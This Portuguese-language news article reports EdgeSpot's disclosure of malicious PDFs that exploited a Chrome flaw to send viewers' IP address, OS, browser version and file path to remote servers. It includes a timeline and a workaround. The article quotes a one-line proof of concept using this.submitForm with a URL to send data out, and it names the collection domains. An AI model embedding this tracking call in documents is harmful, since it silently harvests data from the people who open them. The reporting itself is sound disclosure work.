Uma vulnerabilidade zero-day em ficheiros PDF recolhe dados dos utilizadores quando acedido no Google Chrome.

Serviço de detecção de exploração do EdgeSpot identificou vários documentos em PDF que exploram uma vulnerabilidade de dia zero no Chrome para recolher dados dos utilizadores que abrem os ficheiros por meio do popular navegador de Internet.

Em dezembro de 2018 foram detetados os primeiros PDFs maliciosos pelos especialistas.

Quando a vítima abre o ficheiro PDF com o Google Chrome, o documento é exibido, enquanto o código malicioso recolhe os dados da vítima em segundo plano e envia-os para um servidor remoto sob o controle dos criminosos.

Os dados capturados incluem o endereço IP, o sistema operativo e as versões do Chrome, além do caminho completo do ficheiro PDF no sistema da vítima.

Since late December 2018, EdgeSpot has detected multiple PDF samples in the wild which exploit a Google Chrome zero-day flaw.” reads the analysis published by EdgeSpot.

“The exploited vulnerability allows the sender of the PDF files to track the users and collect some user’s information when they use Google Chrome as a local PDF viewer.”

 

É interessante notar que, se as vítimas abrirem os mesmos ficheiros com o Adobe Reader, nada acontece.

Os especialistas observaram ainda que os dados são enviados para os servidores remotos por meio de solicitações HTTP POST sem exigir nenhuma interação do utilizador. Os dados foram enviados para um dos dois domínios: burpcollaborator[.]net ou readnotify[.]com.

malicious-PDF-chrome-zero-day

 

Um dos ficheiros analisados pelo EdgeSpot, é um documento do Lonely Planet sobre a história das Ilhas da Baía das Honduras.

A maioria das amostras detetadas tem uma baixa taxa de deteção no VirusTotal, no momento em que foi escrito que apenas dois produtos antivírus são capazes de detetá-los.

Os especialistas analisaram o documento e validaram código javascript suspeito na stream-1. O código foi identificado na root em ““this.submitForm()” .

“We tested it with a minimal PoC, a simple API call like “this.submitForm(‘http://google.com/test’)” will make Google Chrome send the personal data to google.com.” states the experts.

We decided to release our finding prior to the patch because we think it’s better to give the affected users a chance to be informed/alerted of the potential risk, since the active exploits/samples are in the wild while the patch is not near away. “

 

Aos utilizadores urge não utilizar o Google Chrome para a abertura de PDFs. Como workaround, pode ser utilizado uma outra aplicação terceira para abrir PDFs, ou caso seja pretendido mesmo assim utilizador o Chrome, o device deve ser desconectado da Internet.

 

Timeline:

  • 2018.12.26 Finding reported to Google
  • 2019.02.12 More samples were detected during the period
  • 2019.02.14 After multiple communications with the Chrome team, we were informed the issue will be landed on official Chrome in late April. Chrome team were informed about this blog post release
  • 2019.02.26 Blog post released